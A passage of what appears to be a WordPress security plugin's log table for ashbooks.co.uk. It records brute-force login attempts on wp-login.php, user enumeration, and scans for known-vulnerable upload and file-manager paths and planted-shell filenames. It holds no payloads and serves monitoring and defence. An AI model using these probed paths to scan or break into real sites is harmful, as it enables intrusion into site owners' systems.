TRrkYNue','','13|0|0|0|ashbooks.co.uk/js/tinymce1/plugins/filemanager/language/index.php'),('105.189.21.216',1773999576,'',0,1638380553.3862,100,'p5VoRrhwMa3NQOct7mTvKiGA','','13|0|0|0|ashbooks.co.uk/tinymce/plugins/filemanager/language/index.php'),('105.189.21.216',1773999576,'',0,1638380554.3181,100,'ZY6jCXb8RITHdlWPS2KF4ike','','13|0|0|0|ashbooks.co.uk/tinymce/plugins/imagemanager/language/index.php'),('197.2.127.246',3305275382,'',0,1638380562.3061,50,'mElzAvtwITZUrMFjNnC5iaxS','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('105.189.21.216',1773999576,'',0,1638380575.6852,55,'IeojfbzqBRSJhwLym83vs2a5','','19|0|0|0|ashbooks.co.uk/modules/megaproduct/upload/index.php'),('105.189.21.216',1773999576,'',0,1638380576.6489,100,'16cH2YKhTls3PfiryJOGx9oC','','13|0|0|0|ashbooks.co.uk/js/tinymce4/js/tinymce/plugins/moxiemanager/api.php'),('105.189.21.216',1773999576,'',0,1638380578.3483,100,'fnSRZv9A3oquHFCsGDMeJUwE','','13|0|0|0|ashbooks.co.uk/tinymce/plugins/moxiemanager/api.php'),('105.189.21.216',1773999576,'',0,1638380580.2709,100,'pL12rWyB5deZsbm4YoGITXEK','','13|0|0|0|ashbooks.co.uk/js/tinymce/plugins/moxiemanager/api.php'),('105.189.21.216',1773999576,'',0,1638380581.9164,55,'GJfZBhen5VAFWpsIYlcrQ734','','19|0|0|0|ashbooks.co.uk/plugins/vmcustom/photoupload/assets/server/php/index.php'),('105.189.21.216',1773999576,'',0,1638380584.5960,55,'GYrdiO5couP2fB8xgJ3n7AsX','','19|0|0|0|ashbooks.co.uk/js/server/php/index.php'),('105.189.21.216',1773999576,'',0,1638380587.9074,100,'3D0NMaUdi7cOCFvJKPb5TS4l','','13|0|0|0|ashbooks.co.uk/index.php'),('105.189.21.216',1773999576,'',0,1638380589.9600,100,'zeQFZEpBWrHjLgob6UV5COM9','','13|0|0|0|ashbooks.co.uk/components/com_hdflvplayer/hdflvplayer/download.php'),('197.2.127.246',3305275382,'',0,1638380601.4280,50,'9omzKYXU5wG8MDQlyL6nO72p','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638380640.7130,50,'RI1LuZrOk0zyaUKv6wn7TBhs','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638380679.6553,50,'B8DGCMVjwqAKoLFxlZrzaNWs','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638380719.1470,50,'PdNBzl1s2OnSZ4pcHqJxYUtw','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638380756.6511,50,'skAtr5Mjmoq0h9IURNEO4vpz','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638380795.4179,50,'Qs81gE5W3l2YPrSdxUM4Ko96','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638380842.3721,50,'O1Rz4VKNFG75uXx20QfeYBb9','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638380885.3725,50,'10ONHMIcjDWY2tkgETlQiGRA','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638380932.0483,50,'2OvTh38LyHknwl90X75FCMiW','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381001.1695,50,'HtRYx1rfPdz6sWTe48JZSBEC','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381041.9525,50,'AwMcGUTfkYKxatZ1X2DReHWQ','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381099.7255,50,'MNCAStOrq7Q2azcVnbW9ZlTe','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381149.3790,50,'10LimwxVIEbOt8zWAsjodZBn','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381192.5893,50,'NxCf6acKEGLUQ2wmYJ0P5T4t','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381251.7974,50,'Cl50J9SrbfsKaYFIApRy8EO1','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381294.0380,50,'WR86sE3bHvqMFGCNZ4T2lAVK','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381340.5335,50,'94MibO3L2HDpsIEe7BP8l1zF','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381381.8341,50,'7o9tsaqPYpGwASbNdQfO5DFW','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381427.8201,50,'rzws5vZjXDyGqcag2o10fK8W','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381474.9289,50,'42dBl967IzouD5CvMp8KNgqx','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381518.0735,50,'78FU5ZSqWhtdMEuyx21XvBIw','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381558.1530,50,'JsbUBGSVjMl19zfPDdQnRZKO','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381599.4707,50,'w9qgE4MRJi1eX3a5rHCpYbDf','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381643.8817,50,'ZpUauOTRYbmtDlHPqXoijF36','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381687.5211,50,'HtrkmveBfG83qiSaLTEnK2RU','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381728.8758,50,'xGUId9moJn5LPf2juZWMaNTQ','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381769.8311,50,'BVai4SyJQw7CWLuUZYFrP5bX','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('44.232.212.251',753456379,'',0,1638381792.0424,70,'dxZ7AveHT82nyi4zkMotNpfR','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('197.2.127.246',3305275382,'',0,1638381810.7559,50,'IQK3GFmrHM216ALVlOJX0Rp5','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381851.0121,50,'2AHYVNtTrG8jsxSeMaB3hu09','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381891.3947,50,'NX31l5BmTdZFkSMzwKWusHaV','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381934.7452,50,'WT8eAIPSKJBqc0vRkxsOuEiQ','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638381977.5382,50,'7i6fO3pAsBIFChTQHK0oz4Jj','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382022.3496,50,'peu7aDtQvMhYALS10R9zjxrH','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382067.3204,50,'vikxcwy2ZKVG9mTJqFDSsIP4','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382108.6344,50,'0X9lHqtYWApOuNBzFkr6xcI2','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382149.8233,50,'8yf0nea94RoIDviGFjpcVOSU','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382192.1553,50,'6VxkMwWGErd9J5v4Zjens7QC','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382233.7189,50,'jYIPJ7vnsqZgV8wdaGh63RTE','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382280.0583,50,'LtXyWE8AlUSidbQYoHmNa6C2','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382326.2469,50,'wAjh7MospSePXJQkzfZNHW6E','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382369.0336,50,'HNOrIPvD0GEsQCAj65xZ8XMb','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382412.0550,50,'rpyUkY0aloHXu38WVQPc1jI9','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382459.6696,50,'s45XHnFACM2uK3iqbvr8lPVh','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382508.0420,50,'y7unAwzHpl6UFJXY8IW1qEOr','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382553.0726,50,'RlG5h1Hd4oKDa2LjinPEyMgr','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382595.1968,50,'N4yVQ0P8HuTq7a1kUJGYsWjh','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382642.9795,50,'jJ9mbHwXi7lCagUY8sMODqpP','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382721.5330,50,'qFpPrtoRmZd6Vy5iLX34wBvh','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382769.2135,50,'0a3Towz6IBGy9HXhuClOZcjQ','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382837.5205,50,'ZR2FX1piGBxKkjcvrNA9nsze','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382884.2582,50,'uyMwvngZYcPCSDV680oUx5A4','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382929.0510,50,'0aHshYQXd8D7kBfNI1oT2453','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638382971.8551,50,'is1FUYBnK6GAd3VQb9SJPmCW','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383015.0975,50,'4oGMcE6dCOjRyrZPFYJhwA1p','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383057.9026,50,'o43EVkKrf9sOB5YLpNInMgji','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383100.6757,50,'xoQZ63LqnuA2p8JdmDcWEkCb','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('105.72.158.66',1766366786,'',0,1638383124.1653,70,'oh1q8EBsMXJgLy0cWrmnY7GP','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('197.2.127.246',3305275382,'',0,1638383144.5417,50,'1RMxZcB3Sui94zCwjDf52UEQ','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383189.7501,50,'Frha87OAJjCiYvlWNTgsuVD5','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383232.9512,50,'xMz6DjnBq4Kr9SipCdye0a2O','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383275.8333,50,'o9AQLM5pw3OkiEjV7lCyzXrh','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383318.2849,50,'NivUk6RAtEKg8DeVIBHQY2Ma','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383361.6134,50,'BkUowjKzhNat7TL0A2IQPZvg','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383401.9489,50,'JRVfEudmTnSYwtxoIkbhz3q1','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383445.3083,50,'CRk3ITN8GaWHjBVDPpsSy5eh','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383488.5545,50,'8trv6dnRL1eSmKhBkFUzs2lJ','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383531.6427,50,'UvR3jat8LKs2Px5eVZciguOw','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383573.5769,50,'diezR5WutU40cvgSLO1FTb9P','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383615.9679,50,'CwG4itkWSUA9yavLIKlZm7ds','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383658.4857,50,'HaoQFpxLN0ek8hT5ER1Knywi','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383700.9680,50,'S9o4wBabfIpZ6zy1rmHjAE0O','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383748.9117,50,'dhmwRrUenQLx6VKpPkuy1sH8','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383789.3886,50,'cXQflFRzZv7N4IMny2ktHCL5','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383834.3641,50,'Mvdat9xFHwClALjp4Bf857hK','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('46.232.249.138',787020170,'ashbooks',0,1638383859.1392,51,'KEvW57jDMV31XCmpbxHNyYrI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383887.6558,50,'PDj3veF95IoAXHVi4y7sESYd','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383950.1997,50,'B3duhypYZT9C4Ivatg5ecN8n','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638383996.7830,50,'b29mrPacSCfwURXsxIpv0eu4','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('197.2.127.246',3305275382,'',0,1638384041.5281,50,'rPcIOXlgSmpBFhT6Q7dAHwUL','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('196.75.186.8',3293297160,'',0,1638384399.5240,55,'Ed50wh3nSQiPZecTVGDpLF69','','19|0|0|0|ashbooks.co.uk/wp-admin/vuln.php'),('196.75.186.8',3293297160,'',0,1638384415.5283,55,'tTa3p97xlw2HdsbPuXoJWgLv','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/formcraft/file-upload/server/content/upload.php'),('196.75.186.8',3293297160,'',0,1638384429.4733,55,'CQV0OURipq8McexbKHZ5Nuoh','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/hd-webplayer/playlist.php'),('196.75.186.8',3293297160,'',0,1638384432.2871,55,'RCTYPnMubKf7o12xWahvmFwj','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php'),('196.75.186.8',3293297160,'',0,1638384432.9603,55,'3mVUyBca9tvbKnSqfHF7QMrj','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php'),('196.75.186.8',3293297160,'',0,1638384432.9818,10,'3mVUyBca9tvbKnSqfHF7QMrj','','707|0|0|0|ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php'),('196.75.186.8',3293297160,'',0,1638384434.7326,55,'vspheauKjC1mx3Dd0irnLF9G','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/viral-optins/api/uploader/file-uploader.php'),('196.75.186.8',3293297160,'',0,1638384436.1766,100,'N9xPDR2ry1QtgMUBzjwdXT7V','','13|0|0|0|ashbooks.co.uk/fckeditor/editor/filemanager/connectors/php/upload.php'),('196.75.186.8',3293297160,'',0,1638384437.9774,50,'IFHUfgVD90urk4M1jR3Xwvid','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('95.105.65.146',1600733586,'',0,1638390567.5556,55,'ot4aHC3wETMuezKFAyDgXiG1','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('192.187.127.21',3233513237,'admin',0,1638395737.4177,7,'GcUKySwXgoV3l4M8AdZqu2kQ','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'ashbooks',0,1638401858.5776,51,'Ebfr0k3YWLSHaBU1DNGQlMsK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('106.12.77.101',1779191141,'admin',0,1638403230.5679,7,'pWDJvQo2zaVxF7eksbICZSlN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.62.32.134',2990416006,'admin',0,1638405058.6503,7,'0Je1aICkTHRdZUwMGqvplQnP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('199.192.30.216',3351256792,'admin',0,1638407110.5734,7,'pWGuFZqaeyNc8f2KLxS50nXi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.51.103.73',1731422025,'admin',0,1638409222.2431,7,'gHBmnLD7JvsS4TFqU2xElbYW','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('108.163.233.106',1822681450,'admin',0,1638411212.0924,7,'shGvqtQAj4uTbWdOUlkNmJie','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.181.180.168',1807070376,'',0,1638411635.3585,55,'4eNolXv6yWwC5naiqJ28bsIG','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('52.249.253.235',888798699,'',0,1638412281.7236,55,'UGO1heBwDkWspX895F6ijHQ4','','19|0|0|0|ashbooks.co.uk/1index.php'),('52.249.253.235',888798699,'',0,1638412322.7464,55,'jNYQg39KCpGZonA7q1vkfSbx','','19|0|0|0|ashbooks.co.uk/1index.php'),('159.65.225.6',2671894790,'admin',0,1638413156.7121,7,'pkmcH3jxqs9yUEFuJwAbSKaQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.71.17.63',2806452543,'admin',0,1638415039.4510,7,'8BwetG1ZyzdskSLaRCDg0jVA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.109.30.30',1735204382,'admin',0,1638416105.8383,7,'s6LmWrENdaUHRkZc71xz0Q9e','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.119.213.225',762828257,'admin',0,1638416936.9123,7,'02EytrWGHCRTaAmFvpefOI8g','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('35.195.135.67',600016707,'admin',0,1638417619.4362,7,'0XohQREs9Uzm47JnfpTOxFZD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.64.150.99',3225458275,'admin',0,1638418269.9628,7,'z1IMZQUaLW7xdSCq0y3VoTFD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('204.12.198.242',3423389426,'admin',0,1638418593.3701,7,'TL4G2cw1tECRHeAiPpnBaMNX','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('82.223.55.49',1390360369,'admin',0,1638418997.6750,7,'10aYNFQ5LTd6bV29hHon7vkD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.165.116.22',3114628118,'admin',0,1638419725.1239,7,'SyhIb83i9raoWmvLU4df6kVD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.209.153.32',1741789472,'admin',0,1638420369.6748,7,'i8km07WH1UVzfbwM9vZcnXat','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.199.146.31',1757909535,'admin',0,1638420999.8361,7,'1dPfjrxK9v6yUOmYGDwR7nQL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('212.224.76.233',3571469545,'admin',0,1638421515.6350,7,'JVySiY10TICtvE7dxu4Ba8MW','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.62.9.122',2990410106,'admin',0,1638422163.9480,7,'BK2W4ZdQSCO8xGlvXtyIYnu0','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('135.181.111.177',2276814769,'admin',0,1638422748.0429,7,'6RcNP4kt23hp0n8OJYaZxUiq','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.97.154.64',2707528256,'admin',0,1638423286.9217,7,'JflNo8Mn7qhSpC2tOcrWV1ed','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('200.58.109.114',3359272306,'admin',0,1638423845.9890,7,'4oP5IVujiNtl0pX2G6aCsMFn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('131.72.221.190',2202590654,'admin',0,1638424422.1770,7,'NIwWHf8Rj9B6DqM2ukpCSTe3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.62.110.145',2990435985,'admin',0,1638424943.5069,7,'yjmv1grshQ8K4wtYOZocUCST','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('212.192.241.6',3569414406,'',0,1638425186.4086,55,'nRmGd7erqoEXsOCP3k8wzcIW','','19|0|0|0|ashbooks.co.uk/1index.php'),('212.192.241.6',3569414406,'',0,1638425268.0108,55,'pImSiuajkT97lNH14JFLdW82','','19|0|0|0|ashbooks.co.uk/1index.php'),('192.163.204.229',3231960293,'admin',0,1638425472.6316,7,'fg9Ro2tcTHLK5BeyhEsq4O8u','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.228.109.147',400846227,'',0,1638426307.4895,55,'AS2ETxuVIa5QbBl3vg4Md1Ff','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php'),('177.55.124.21',2973203477,'admin',0,1638426519.4909,7,'yqkPjEtW24xz6ZD1LaTQvdln','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.97.178.213',2707534549,'admin',0,1638427065.5031,7,'TYQ82lehHDtg7fu09crxBaWA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.131.18.212',1753420500,'admin',0,1638427659.6981,7,'TmSDPNCdtVnvigeQkB0aXqpH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.231.156',1159653276,'admin',0,1638427682.6347,7,'p1BDHOzrYZmg79SvoT5h3Il2','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('173.212.214.140',2916406924,'admin',0,1638428132.5410,7,'K309WjqmGdx2zDotZFAI8lbw','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('148.72.211.177',2487800753,'admin',0,1638428678.5091,7,'HiTgcrNjASCI09yzoBPd5Kks','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('147.182.248.182',2478241974,'admin',0,1638429179.0720,7,'EqBCyzVXk9jirQbOP1KLpfJR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('39.106.105.38',661285158,'admin',0,1638430276.9821,7,'RUhZvBGTd2L4XAr7KyOxo1zm','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.74.118.242',1732933362,'admin',0,1638430887.4317,7,'qdptmoQgGinSzLl36X5aRMFO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.64.218.102',574675558,'admin',0,1638431482.5868,7,'AtC0SswZcG7Vamu2pHrhiLWy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.35.210.101',2703479397,'admin',0,1638432001.9877,7,'T8qeN4G7l0mKQZwrcHRI1uVs','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.46.109.153',1496214937,'admin',0,1638432666.6531,7,'kCpbnWV8jv5tGRIoTL0zNMDe','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.46.109.153',1496214937,'admin',0,1638433218.9164,7,'9DbUJQ26AaBHPcdmqsKtNREL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.165.118.46',3114628654,'admin',0,1638433839.9323,7,'FqnRaJwUu90yCpEso8OWtlGf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('142.93.170.99',2388503139,'admin',0,1638434397.4993,7,'OvKWITfZ1DkNgut6zAx4bJFH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('142.93.99.56',2388484920,'admin',0,1638435017.5223,7,'nYXj4atEFI7RvAmsgz5BO9NV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.14.157',2994736797,'admin',0,1638435580.7310,7,'47cf6lqDItJOei95E2kmLz3d','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('139.196.88.192',2344900800,'admin',0,1638436176.2827,7,'Fsh2zqAt9j3UEVYLSGpaWuQw','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.236.45.171',1760308651,'admin',0,1638436748.4352,7,'XvK5P6aoBFnqcZGSAzs8Dekh','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.101.157.216',90545624,'admin',0,1638437412.6688,7,'VokOJE7wNDFZjdWYlaUC1v5T','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.127.21',3233513237,'admin',0,1638437487.7772,7,'1ElhC2XqGuUOjIHowKs4pAJe','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('175.208.204.100',2949696612,'admin',0,1638437988.4143,7,'1WPrpL79SQB4bDFsOgcVtN2v','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.110.84.33',1735283745,'admin',0,1638438616.9268,7,'7XhYZ1wR9J8iIlKe2DTzcmQP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.214.229.147',2731992467,'admin',0,1638439255.9218,7,'cv9RH5Os8F6oj4E7IyKd2x1A','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('128.199.120.41',2160556073,'admin',0,1638439809.5080,7,'jhBoF2rYGkPVCsQwxDIAdep9','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.61.153.71',3107821895,'admin',0,1638440457.9850,7,'tpHxBGK2w37T0RWhsSaOkueA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.35.106.236',2703452908,'admin',0,1638441067.6574,7,'oF4ZsvG0dP5ewrDM8y9uQSYW','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('193.189.75.222',3250408414,'admin',0,1638441766.7559,7,'ZiMDh4EWGUmVNBl3nXzq8LRx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.233.2.147',1743323795,'admin',0,1638442404.1561,7,'HOkX7nGCBr0tgvQ4jPlFxzMm','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.150.57.35',1805007139,'admin',0,1638442786.8534,7,'0c5uayBbgMn2HKNjZpxYLGTO','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('143.110.157.74',2406391114,'admin',0,1638442971.5284,7,'5BsDFWGCZYak8PXIhr7jQxJL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.103.199.252',3110586364,'',0,1638443110.8837,55,'k6twgODvT7J8dfQHxN91Wm0o','','19|0|0|0|ashbooks.co.uk/wp-class.php'),('185.103.199.196',3110586308,'',0,1638443112.2110,55,'kjhleHDLPSaXR05ti3rvQfZN','','19|0|0|0|ashbooks.co.uk/wp-includes/wp-class.php'),('185.103.199.195',3110586307,'',0,1638443112.5943,55,'v0WuzfImgqSNs9TRMJnYoBL7','','19|0|0|0|ashbooks.co.uk/wp-content/themes/sketch/404.php'),('185.103.199.251',3110586363,'',0,1638443116.1686,55,'vPug4Nf6OC8zTGLEMxcjIXde','','19|0|0|0|ashbooks.co.uk/css/index.php'),('185.103.199.253',3110586365,'',0,1638443116.6071,55,'ialOpENTfxmQVdnbucHGLy1W','','19|0|0|0|ashbooks.co.uk/wp-content/themes/sketch/404.php'),('185.103.199.119',3110586231,'',0,1638443117.4981,55,'nlgpcdMUC0jYXL18i9sQN7Aa','','19|0|0|0|ashbooks.co.uk/wp-content/themes/sketch/content-sample.php'),('111.231.82.232',1877431016,'admin',0,1638443651.8325,7,'YiTh4XCFfBLt6Q9gDAsuyWJO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.57.223.190',1731846078,'',0,1638443701.2281,70,'WnwAiBxE58OyuqGh9jzV2tT6','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('151.106.55.242',2540320754,'admin',0,1638444268.0128,7,'RLZfuwgy1smPNz6Ki3vYX4jt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.225.177.43',400666923,'admin',0,1638444883.3615,7,'7glzm1jyarRubJ5TqdVoiEXf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('91.203.111.125',1540059005,'admin',0,1638445451.4206,7,'Tgiq0ps4dmcQyRBjLzNbPHWk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.99.12.57',2808286265,'admin',0,1638446154.5794,7,'dF8OaAeITjz91mHtPMlkvCKY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.63.10.206',88017614,'admin',0,1638446830.5250,7,'wJtMzd0KU3snXcLFilPDNVHb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.99.76.109',3227733101,'admin',0,1638447432.6154,7,'VtlWomTkY1DCsr968wELnyXQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.245.107.81',2650106705,'admin',0,1638448080.0408,7,'OmRPKktasqirZlLUcTFY4eBb','','0|0|0|0|ashbooks.co.uk/wp-login.php'